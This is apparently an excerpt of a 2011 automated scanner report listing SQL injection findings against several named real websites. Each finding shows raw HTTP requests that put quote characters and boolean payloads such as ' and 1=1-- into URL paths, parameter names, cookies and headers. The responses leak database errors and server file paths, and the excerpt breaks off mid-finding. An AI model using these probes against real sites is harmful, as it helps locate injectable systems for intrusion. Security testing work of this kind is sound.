The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /sitemap.htm?1'=1 HTTP/1.1 Host: www.baysideeyes.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:25 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 196
MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') ORDER BY old_url DESC LIMIT 1' at line 3
Request 2
GET /sitemap.htm?1''=1 HTTP/1.1 Host: www.baysideeyes.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:27 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 5388
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equi ...[SNIP]...
1.26. http://www.facebook.com/search/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.facebook.com
Path:
/search/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /search/?1'%20and%201%3d1--%20=1 HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response 1 (redirected)
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=UUBNY; path=/; domain=.facebook.com Set-Cookie: noscript=1; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sat, 05 Feb 2011 22:39:35 GMT Content-Length: 15579
GET /search/?1'%20and%201%3d2--%20=1 HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response 2 (redirected)
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=Qj720; path=/; domain=.facebook.com Set-Cookie: noscript=1; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sat, 05 Feb 2011 22:39:36 GMT Content-Length: 15411
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /terms'/team-calendar/calendar.html HTTP/1.1 Host: www.freedownloadscenter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118730462.1296942490.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=118730462.1479561773.1296942490.1296942490.1296942490.1; __utmc=118730462; __utmb=118730462.1.10.1296942490;
Response 1
HTTP/1.1 200 OK Server: Apache/2.2.3 (CentOS) Date: Sat, 05 Feb 2011 22:05:08 GMT Content-Type: text/html Connection: close Content-Length: 376 Keep-Alive: timeout=15, max=500
<br /> <b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>/home/freedownloadscenter.com/htdocs/livehandler.php3</b> on line <b>21</b><br /> <br /> <b>Wa ...[SNIP]...
Request 2
GET /terms''/team-calendar/calendar.html HTTP/1.1 Host: www.freedownloadscenter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118730462.1296942490.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=118730462.1479561773.1296942490.1296942490.1296942490.1; __utmc=118730462; __utmb=118730462.1.10.1296942490;
Response 2
HTTP/1.1 200 OK Server: Apache/2.2.3 (CentOS) Date: Sat, 05 Feb 2011 22:05:08 GMT Content-Type: text/html Connection: close Content-Length: 0 Keep-Alive: timeout=15, max=500
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /terms/team-calendar'/calendar.html HTTP/1.1 Host: www.freedownloadscenter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118730462.1296942490.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=118730462.1479561773.1296942490.1296942490.1296942490.1; __utmc=118730462; __utmb=118730462.1.10.1296942490;
Response 1
HTTP/1.1 200 OK Server: Apache/2.2.3 (CentOS) Date: Sat, 05 Feb 2011 22:05:08 GMT Content-Type: text/html Connection: close Content-Length: 376 Keep-Alive: timeout=15, max=500
<br /> <b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>/home/freedownloadscenter.com/htdocs/livehandler.php3</b> on line <b>21</b><br /> <br /> <b>Wa ...[SNIP]...
Request 2
GET /terms/team-calendar''/calendar.html HTTP/1.1 Host: www.freedownloadscenter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118730462.1296942490.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=118730462.1479561773.1296942490.1296942490.1296942490.1; __utmc=118730462; __utmb=118730462.1.10.1296942490;
Response 2
HTTP/1.1 200 OK Server: Apache/2.2.3 (CentOS) Date: Sat, 05 Feb 2011 22:05:08 GMT Content-Type: text/html Connection: close Content-Length: 0 Keep-Alive: timeout=15, max=500
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /terms/team-calendar/calendar.html' HTTP/1.1 Host: www.freedownloadscenter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118730462.1296942490.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=118730462.1479561773.1296942490.1296942490.1296942490.1; __utmc=118730462; __utmb=118730462.1.10.1296942490;
Response 1
HTTP/1.1 200 OK Server: Apache/2.2.3 (CentOS) Date: Sat, 05 Feb 2011 22:05:08 GMT Content-Type: text/html Connection: close Content-Length: 376 Keep-Alive: timeout=15, max=500
<br /> <b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>/home/freedownloadscenter.com/htdocs/livehandler.php3</b> on line <b>21</b><br /> <br /> <b>Wa ...[SNIP]...
Request 2
GET /terms/team-calendar/calendar.html'' HTTP/1.1 Host: www.freedownloadscenter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118730462.1296942490.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=118730462.1479561773.1296942490.1296942490.1296942490.1; __utmc=118730462; __utmb=118730462.1.10.1296942490;
Response 2
HTTP/1.1 200 OK Server: Apache/2.2.3 (CentOS) Date: Sat, 05 Feb 2011 22:05:09 GMT Content-Type: text/html Connection: close Content-Length: 0 Keep-Alive: timeout=15, max=500
1.30. http://www.freedownloadscenter.com/terms/team-calendar/calendar.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.freedownloadscenter.com
Path:
/terms/team-calendar/calendar.html
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /terms/team-calendar/calendar.html?1'=1 HTTP/1.1 Host: www.freedownloadscenter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118730462.1296942490.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=118730462.1479561773.1296942490.1296942490.1296942490.1; __utmc=118730462; __utmb=118730462.1.10.1296942490;
Response 1
HTTP/1.1 200 OK Server: Apache/2.2.3 (CentOS) Date: Sat, 05 Feb 2011 22:05:06 GMT Content-Type: text/html Connection: close Content-Length: 376 Keep-Alive: timeout=15, max=500
<br /> <b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>/home/freedownloadscenter.com/htdocs/livehandler.php3</b> on line <b>21</b><br /> <br /> <b>Wa ...[SNIP]...
Request 2
GET /terms/team-calendar/calendar.html?1''=1 HTTP/1.1 Host: www.freedownloadscenter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118730462.1296942490.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=118730462.1479561773.1296942490.1296942490.1296942490.1; __utmc=118730462; __utmb=118730462.1.10.1296942490;
Response 2
HTTP/1.1 200 OK Server: Apache/2.2.3 (CentOS) Date: Sat, 05 Feb 2011 22:05:06 GMT Content-Type: text/html Connection: close Content-Length: 0 Keep-Alive: timeout=15, max=500
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET / HTTP/1.1 Host: www.linkatopia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q='
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:39:18 GMT Server: Apache X-Powered-By: PHP/5.2.12 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=fgemhac8fj8cg4vu6sp9l0k041; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Content-Length: 21 Connection: close Content-Type: text/html
Update referer failed
Request 2
GET / HTTP/1.1 Host: www.linkatopia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=''
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:39:19 GMT Server: Apache X-Powered-By: PHP/5.2.12 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=aq32ki9rka3pck407dp563kg41; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Connection: close Content-Type: text/html Content-Length: 15274
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>Linka ...[SNIP]...
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET / HTTP/1.1 Host: www.linkatopia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' Connection: close
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:39:15 GMT Server: Apache X-Powered-By: PHP/5.2.12 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=47l1f14gsf3aq2ifi25sve5r66; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Content-Length: 24 Connection: close Content-Type: text/html
Update user agent failed
Request 2
GET / HTTP/1.1 Host: www.linkatopia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'' Connection: close
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:39:16 GMT Server: Apache X-Powered-By: PHP/5.2.12 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=q9ifci6l2j2tdrl3iv7clgbn71; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Connection: close Content-Type: text/html Content-Length: 15274
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>Linka ...[SNIP]...
1.33. http://www.linkatopia.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.linkatopia.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /?1'=1 HTTP/1.1 Host: www.linkatopia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:39:10 GMT Server: Apache X-Powered-By: PHP/5.2.12 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=68dgcspto6ppv3i6dcpvk1gcl5; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Content-Length: 24 Connection: close Content-Type: text/html
Update page count failed
Request 2
GET /?1''=1 HTTP/1.1 Host: www.linkatopia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:39:13 GMT Server: Apache X-Powered-By: PHP/5.2.12 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=ornsar14q490r54ghf8kqfk9n6; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Connection: close Content-Type: text/html Content-Length: 15274
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>Linka ...[SNIP]...
1.34. http://www.linkfixerplus.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.linkfixerplus.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 16036492%20or%201%3d1--%20 and 16036492%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /?116036492%20or%201%3d1--%20=1 HTTP/1.1 Host: www.linkfixerplus.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access / on this server.</p> <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> <hr> <address>Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.linkfixerplus.com Port 80</address> </body></html>
Request 2
GET /?116036492%20or%201%3d2--%20=1 HTTP/1.1 Host: www.linkfixerplus.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 17:23:02 GMT Server: Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.6 Connection: close Content-Type: text/html Content-Length: 33322
<HTML><HEAD> <link rel="alternate" type="application/rss+xml" title="RSS Feed for LinkTek.com" href="rss/rss.xml" />
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /ads'/adjs.php?n=424430122&what=zone:4&exclude=,&referer=http%3A//burp/show/23 HTTP/1.1 Host: www.linuxsecurity.com Proxy-Connection: keep-alive Referer: http://www.linuxsecurity.com/advisories/?1'=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 473097ac08cef5345a0ef7ef35a119cd=-
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /ads/adjs.php'?n=424430122&what=zone:4&exclude=,&referer=http%3A//burp/show/23 HTTP/1.1 Host: www.linuxsecurity.com Proxy-Connection: keep-alive Referer: http://www.linuxsecurity.com/advisories/?1'=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 473097ac08cef5345a0ef7ef35a119cd=-
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /ads'/adlog.php?bannerid=75&clientid=52&zoneid=4&source=&block=0&capping=0&cb=d44f13e3bc6b9e50f3529e3826e3166b HTTP/1.1 Host: www.linuxsecurity.com Proxy-Connection: keep-alive Referer: http://www.linuxsecurity.com/advisories/?1'=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 473097ac08cef5345a0ef7ef35a119cd=-
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /ads/adlog.php'?bannerid=75&clientid=52&zoneid=4&source=&block=0&capping=0&cb=d44f13e3bc6b9e50f3529e3826e3166b HTTP/1.1 Host: www.linuxsecurity.com Proxy-Connection: keep-alive Referer: http://www.linuxsecurity.com/advisories/?1'=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 473097ac08cef5345a0ef7ef35a119cd=-
The 473097ac08cef5345a0ef7ef35a119cd cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the 473097ac08cef5345a0ef7ef35a119cd cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /advisories/ HTTP/1.1 Host: www.linuxsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 473097ac08cef5345a0ef7ef35a119cd=-'; __utmz=137231789.1296945319.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/23; __utma=137231789.34780583.1296945313.1296945313.1296945313.1; __utmc=137231789; __utmb=137231789.1.10.1296945313;
The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the Referer HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /advisories/ HTTP/1.1 Host: www.linuxsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q='
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the User-Agent HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /advisories/ HTTP/1.1 Host: www.linuxsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' Connection: close
The __utma cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the __utma cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /advisories/ HTTP/1.1 Host: www.linuxsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 473097ac08cef5345a0ef7ef35a119cd=-; __utmz=137231789.1296945319.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/23; __utma=137231789.34780583.1296945313.1296945313.1296945313.1'; __utmc=137231789; __utmb=137231789.1.10.1296945313;
The __utmb cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the __utmb cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /advisories/ HTTP/1.1 Host: www.linuxsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 473097ac08cef5345a0ef7ef35a119cd=-; __utmz=137231789.1296945319.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/23; __utma=137231789.34780583.1296945313.1296945313.1296945313.1; __utmc=137231789; __utmb=137231789.1.10.1296945313';
The __utmc cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the __utmc cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /advisories/ HTTP/1.1 Host: www.linuxsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 473097ac08cef5345a0ef7ef35a119cd=-; __utmz=137231789.1296945319.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/23; __utma=137231789.34780583.1296945313.1296945313.1296945313.1; __utmc=137231789'; __utmb=137231789.1.10.1296945313;
The __utmz cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the __utmz cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /advisories/ HTTP/1.1 Host: www.linuxsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 473097ac08cef5345a0ef7ef35a119cd=-; __utmz=137231789.1296945319.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/23'; __utma=137231789.34780583.1296945313.1296945313.1296945313.1; __utmc=137231789; __utmb=137231789.1.10.1296945313;
<?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999 ...[SNIP]... <a href="http://www.linuxsecurity.com/content/view/154306/">Ubuntu: 1058-1: PostgreSQL vulnerability</a> ...[SNIP]...
1.46. http://www.linuxsecurity.com/advisories/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.linuxsecurity.com
Path:
/advisories/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /advisories/?1'=1 HTTP/1.1 Host: www.linuxsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
